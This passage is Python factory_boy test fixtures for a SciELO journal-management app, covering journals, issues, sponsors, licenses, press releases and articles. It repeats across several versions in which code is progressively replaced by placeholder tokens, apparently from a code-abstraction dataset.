short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudyAreaFactory(factory.Factory):\n <assignment token>\n <assignment token>\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SponsorFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = 